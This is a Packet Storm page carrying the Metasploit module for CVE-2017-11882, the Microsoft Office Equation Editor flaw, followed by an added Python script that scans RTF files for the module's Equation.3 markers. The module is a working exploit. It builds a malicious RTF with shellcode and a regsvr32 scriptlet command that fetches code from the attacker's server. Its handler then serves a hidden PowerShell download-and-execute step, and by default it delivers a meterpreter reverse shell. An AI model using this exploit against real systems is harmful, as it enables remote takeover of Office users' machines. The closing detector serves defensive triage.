URL: https://packetstormsecurity.com/files/145226/Microsoft-Office-Equation-Editor-Code-Execution.html
Submission: On April 22 via api from US — Scanned from DE



MICROSOFT OFFICE EQUATION EDITOR CODE EXECUTION

Microsoft Office Equation Editor Code Execution Posted Dec 6, 2017 Authored by
embedi, Mumbai | Site metasploit.com

This Metasploit module exploits a flaw in how the Equation Editor handles OLE
objects in memory to execute arbitrary code using RTF files without interaction.

tags | exploit, arbitrary
advisories | CVE-2017-11882
SHA-256 | 16ad4379e6651e3ce0e9433a9c32d2a5e70809affcfd3f999c329227ce6dbc46

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::FILEFORMAT


  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Microsoft Office CVE-2017-11882',
      'Description' => %q{
        This module exploits a flaw in the Equation Editor that
        allows an attacker to execute arbitrary code via RTF files without
        interaction. The vulnerability is caused by the Equation Editor
        failing to properly handle OLE objects in memory.
      },
      'Author' => ['mumbai', 'embedi'],
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Nov 15 2017',
      'References' => [
        ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],
        ['URL', 'https://github.com/embedi/CVE-2017-11882']
      ],
      'Platform' => 'win',
      'Arch' => [ARCH_X86, ARCH_X64],
      'Targets' => [
        ['Microsoft Office', {} ],
      ],
      'DefaultTarget' => 0,
      'Payload' => {
        'DisableNops' => true
      },
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'DefaultOptions' => {
        'EXITFUNC' => 'thread',
        'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
      }
    ))

    register_options([
        OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]),
        OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil])
    ])
  end

  def retrieve_header(filename)
    if (not datastore['FOLDER_PATH'].nil?)
      path = "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}"
    else
      path = nil
    end
    if (not path.nil?)
      if ::File.file?(path)
        File.open(path, 'rb') do |fd|
          header = fd.read(fd.stat.size).split('{\*\datastore').first
          header = header.to_s # otherwise I get nil class...
          print_status("Injecting #{path}...")
          return header
        end
      else
        header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
        header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
        header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
      end
    else
      header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
      header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
      header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
    end
    return header
  end



  def generate_rtf
    header = retrieve_header(datastore['FILENAME'])
    object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
    object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
    object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
    object_class << '09000600000000000000000000000100000001000000000000000010000002000'
    object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
    object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
    object_class << '07400720079000000000000000000000000000000000000000000000000000000'
    object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
    object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
    object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000003'
    object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
    object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
    object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
    object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << "00000300040000000000000000000000000000000000000000000000000000000"
    object_class << "000000000000000000000000000000000000000000000000000000000000000\n"


    shellcode = "\x1c\x00"                  #  0:   1c 00                   sbb    al,0x0
    shellcode << "\x00\x00"                 #  2:   00 00                   add    BYTE PTR [eax],al
    shellcode << "\x02\x00"                 #  4:   02 00                   add    al,BYTE PTR [eax]
    shellcode << "\x9e"                     #  6:   9e                      sahf
    shellcode << "\xc4\xa9\x00\x00\x00\x00" #  7:   c4 a9 00 00 00 00       les    ebp,FWORD PTR [ecx+0x0]
    shellcode << "\x00\x00"                 #  d:   00 00                   add    BYTE PTR [eax],al
    shellcode << "\x00\xc8"                 #  f:   00 c8                   add    al,cl
    shellcode << "\xa7"                     # 11:   a7                      cmps   DWORD PTR ds:[esi],DWORD PTR es:[edi]
    shellcode << "\\"                       # 12:   5c                      pop    esp
    shellcode << "\x00\xc4"                 # 13:   00 c4                   add    ah,al
    shellcode << "\xee"                     # 15:   ee                      out    dx,al
    shellcode << "["                        # 16:   5b                      pop    ebx
    shellcode << "\x00\x00"                 # 17:   00 00                   add    BYTE PTR [eax],al
    shellcode << "\x00\x00"                 # 19:   00 00                   add    BYTE PTR [eax],al
    shellcode << "\x00\x03"                 # 1b:   00 03                   add    BYTE PTR [ebx],al
    shellcode << "\x01\x01"                 # 1d:   01 01                   add    DWORD PTR [ecx],eax
    shellcode << "\x03\n"                   # 1f:   03 0a                   add    ecx,DWORD PTR [edx]
    shellcode << "\n\x01"                   # 21:   0a 01                   or     al,BYTE PTR [ecx]
    shellcode << "\x08ZZ"                   # 23:   08 5a 5a                or     BYTE PTR [edx+0x5a],bl
    shellcode << "\xB8\x44\xEB\x71\x12"     # 26:   b8 44 eb 71 12          mov    eax,0x1271eb44
    shellcode << "\xBA\x78\x56\x34\x12"     # 2b:   ba 78 56 34 12          mov    edx,0x12345678
    shellcode << "\x31\xD0"                 # 30:   31 d0                   xor    eax,edx
    shellcode << "\x8B\x08"                 # 32:   8b 08                   mov    ecx,DWORD PTR [eax]
    shellcode << "\x8B\x09"                 # 34:   8b 09                   mov    ecx,DWORD PTR [ecx]
    shellcode << "\x8B\x09"                 # 36:   8b 09                   mov    ecx,DWORD PTR [ecx]
    shellcode << "\x66\x83\xC1\x3C"         # 38:   66 83 c1 3c             add    cx,0x3c
    shellcode << "\x31\xDB"                 # 3c:   31 db                   xor    ebx,ebx
    shellcode << "\x53"                     # 3e:   53                      push   ebx
    shellcode << "\x51"                     # 3f:   51                      push   ecx
    shellcode << "\xBE\x64\x3E\x72\x12"     # 40:   be 64 3e 72 12          mov    esi,0x12723e64
    shellcode << "\x31\xD6"                 # 45:   31 d6                   xor    esi,edx
    shellcode << "\xFF\x16"                 # 47:   ff 16                   call   DWORD PTR [esi]
    shellcode << "\x53"                     # 49:   53                      push   ebx
    shellcode << "\x66\x83\xEE\x4C"         # 4a:   66 83 ee 4c             sub    si,0x4c
    shellcode << "\xFF\x10"                 # 4e:   ff 10                   call   DWORD PTR [eax]
    shellcode << "\x90"                     # 50:   90                      nop
    shellcode << "\x90"                     # 51:   90                      nop

    footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
    footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'
    footer << '00000000000000000000000000000000000000000000000000000'
    footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'
    footer << '00000000000000000000000000000000000000000000000000000000000000400'
    footer << '0000C5000000000000000000000000000000000000000000000000'
    footer << '0000000000000000000000000000000000000000000000000000000000000000'
    footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'
    footer << '000000000000000000000000000000000000000000000000000000'
    footer << '0000000000000000000000000000000000000000000000000000000000000000'
    footer << '000000000000000000000000000000000000000000000000000000'
    footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'
    footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'
    footer << '00000000000000000000000000000000000000000000000000000000000000000'
    footer << '00000000000000000000000000000000000000000000000000000'
    footer << '00000000000000000000000000000000000000000000000000000000000000000'
    footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'
    footer << '00000000000000000000000000000000000000000000000000000000000000000'
    footer << '00000000000000001050000050000000D0000004D45544146494C'
    footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'
    footer << '500000002001C0000000000050000000902000000000500000002'
    footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'
    footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'
    footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'
    footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'
    footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'
    footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'
    footer << '00030000000000' + "\n"
    footer << '}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260' + "\n"
    footer << "0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\n"
    footer << "0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\n"
    footer << "1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\n"
    footer << "0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\n"
    footer << "0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\n"
    footer << "002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\n"
    footer << "000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\n"
    footer << "0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\n"
    footer << "00000000\n"
    footer << "}}}\n"
    footer << '\par}' + "\n"


    payload = shellcode
    payload += [0x00402114].pack("V")
    payload += "\x00" * 2
    payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll"
    payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
    payload = header + object_class + payload + footer
    payload
  end



  def gen_psh(url, *method)
    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl

    if method.include? 'string'
      download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
    else
      # Random filename to use, if there isn't anything set
      random = "#{rand_text_alphanumeric 8}.exe"
      # Set filename (Use random filename if empty)
      filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']

      # Set path (Use %TEMP% if empty)
      path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')

      # Join Path and Filename
      file = %Q(echo (#{path}+'\\#{filename}'))

      # Generate download PowerShell command
      download_string = Rex::Powershell::PshMethods.download_run(url, file)
    end

    download_and_run = "#{ignore_cert}#{download_string}"

    # Generate main PowerShell command
    return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
  end

  def on_request_uri(cli, request)
    if request.raw_uri =~ /\.sct$/
      print_status("Handling request for .sct from #{cli.peerhost}")
      payload = gen_psh("#{get_uri}", "string")
      data = gen_sct_file(payload)
      send_response(cli, data, 'Content-Type' => 'text/plain')
    else
      print_status("Delivering payload to #{cli.peerhost}...")
      p = regenerate_payload(cli)
      data = cmd_psh_payload(p.encoded,
                       payload_instance.arch.first,
                       remove_comspec: true,
                       exec_in_place: true
      )
      send_response(cli, data, 'Content-Type' => 'application/octet-stream')
    end
  end


  def rand_class_id
    "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
  end


  def gen_sct_file(command)
    # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).
    if command == ''
      return %{<?XML version="1.0"?><scriptlet><registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"></registration></scriptlet>}
    # If a command is provided, tell the target system to execute it.
    else
      return %{<?XML version="1.0"?><scriptlet><registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
    end
  end


  def primer
    file_create(generate_rtf)
  end
end
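
A defender-side companion to the module above, added here and not part of the Metasploit module or of Packet Storm: a Python triage script that walks an RTF for embedded objects, decodes the \objdata hex and reports the markers the module's generate_rtf produces (\objclass Equation.3, \objupdate, an OLE 1.0 header naming Equation.3, the compound-file magic D0CF11E0A1B11AE1 and the UTF-16LE stream name "Equation Native"). The OLE 1.0 ObjectHeader layout it parses is the MS-OLEDS one; the two RTF documents it scans are constructed samples, not files from the page.

```python
import re
import struct
from dataclasses import dataclass, field

CFB_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")            # OLE compound file header
EQUATION_NATIVE = "Equation Native".encode("utf-16-le")  # storage name seen in the blob
OBJ_START = re.compile(r"\{\\object\b")                  # start of each embedded object

@dataclass
class RtfObjectReport:
    objclass: str               # \objclass control word in the RTF
    auto_update: bool           # \objupdate present: activated on open, no click needed
    ole_class: str              # class name from the OLE 1.0 ObjectHeader in \objdata
    has_cfb: bool               # native data starts with a compound file
    has_equation_native: bool   # "Equation Native" stream name present in native data
    findings: list = field(default_factory=list)   # empty list means not suspicious

def _group_at(text, start):
    """Return the balanced {...} group starting at text[start]; honours \\{ \\} \\\\."""
    depth, i = 0, start
    while i < len(text):
        c = text[i]
        if c == "\\":
            i += 2                      # control symbol or escaped brace: skip both chars
            continue
        if c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
        i += 1
    return text[start:]                 # unterminated group: malformed RTF, take the rest

def _lpstr(buf, off):
    """MS-OLEDS LengthPrefixedAnsiString: u32 length (incl. NUL) followed by the bytes."""
    (n,) = struct.unpack_from("<I", buf, off)
    return buf[off + 4:off + 4 + n].rstrip(b"\0").decode("latin-1"), off + 4 + n

def parse_objdata(blob):
    """Split an \\objdata blob into (OLE class name, native data); native data is b""
    when the header is truncated or FormatID is not 2 (EmbeddedObject)."""
    try:
        _version, format_id = struct.unpack_from("<II", blob, 0)
        cls, off = _lpstr(blob, 8)
        for _ in range(2):              # TopicName and ItemName, usually empty
            _, off = _lpstr(blob, off)
        if format_id != 2:
            return cls, b""
        (size,) = struct.unpack_from("<I", blob, off)
        return cls, blob[off + 4:off + 4 + size]
    except struct.error:
        return "", b""

def inspect_object(group):
    """Report on one {\\object ...} group of an RTF document."""
    m = re.search(r"\\objclass\s+([^\\{}]+)", group)
    objclass = m.group(1).strip() if m else ""
    m = re.search(r"\\objdata\s*([0-9A-Fa-f\s]+)", group)
    hexdata = re.sub(r"\s+", "", m.group(1)) if m else ""
    blob = bytes.fromhex(hexdata[:len(hexdata) & ~1])   # drop a dangling odd nibble
    ole_class, native = parse_objdata(blob)
    rep = RtfObjectReport(objclass, "\\objupdate" in group, ole_class,
                          native.startswith(CFB_MAGIC), EQUATION_NATIVE in native)
    if "equation" in (objclass + ole_class).lower():
        rep.findings.append("Equation Editor (Equation.3) object embedded")
    if rep.has_equation_native:
        rep.findings.append("'Equation Native' stream name inside the OLE data")
    if rep.findings and rep.auto_update:
        rep.findings.append("\\objupdate set: object is activated when the file opens")
    return rep

def scan_rtf(text):
    """Return one RtfObjectReport per embedded object in an RTF document (str)."""
    return [inspect_object(_group_at(text, m.start())) for m in OBJ_START.finditer(text)]

def build_objdata(cls, native):
    """Constructed OLE 1.0 EmbeddedObject blob (hex) in the layout the module's \\objdata
    shows: version 0x501, FormatID 2, class name, empty TopicName/ItemName, size, data."""
    hdr = struct.pack("<III", 0x501, 2, len(cls) + 1) + cls.encode() + b"\0"
    hdr += struct.pack("<II", 0, 0)
    return (hdr + struct.pack("<I", len(native)) + native).hex()

# Constructed samples: the first mirrors the shape generate_rtf emits, the second embeds a plain Package object.
SUSPECT_RTF = (r"{\rtf1\ansi\deff0{\fonttbl{\f0\fnil Calibri;}}\pard {\object\objemb\objupdate"
               r"{\*\objclass Equation.3}\objw380\objh260{\*\objdata "
               + build_objdata("Equation.3", CFB_MAGIC + b"\0" * 16 + EQUATION_NATIVE)
               + r"}{\result{\pict\wmetafile8 00}}}\par}")
BENIGN_RTF = (r"{\rtf1\ansi\pard {\object\objemb{\*\objclass Package}{\*\objdata "
              + build_objdata("Package", b"ABCD") + r"}}\par}")

if __name__ == "__main__":
    for name, doc in (("suspect", SUSPECT_RTF), ("benign", BENIGN_RTF)):
        for rep in scan_rtf(doc):
            print("FLAG" if rep.findings else "ok  ", name, rep.objclass, rep.ole_class, rep.findings)
```

A FLAG on an inbound attachment is a reason to detonate it in a sandbox rather than open it; mail-gateway or YARA rules can key on the same markers.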
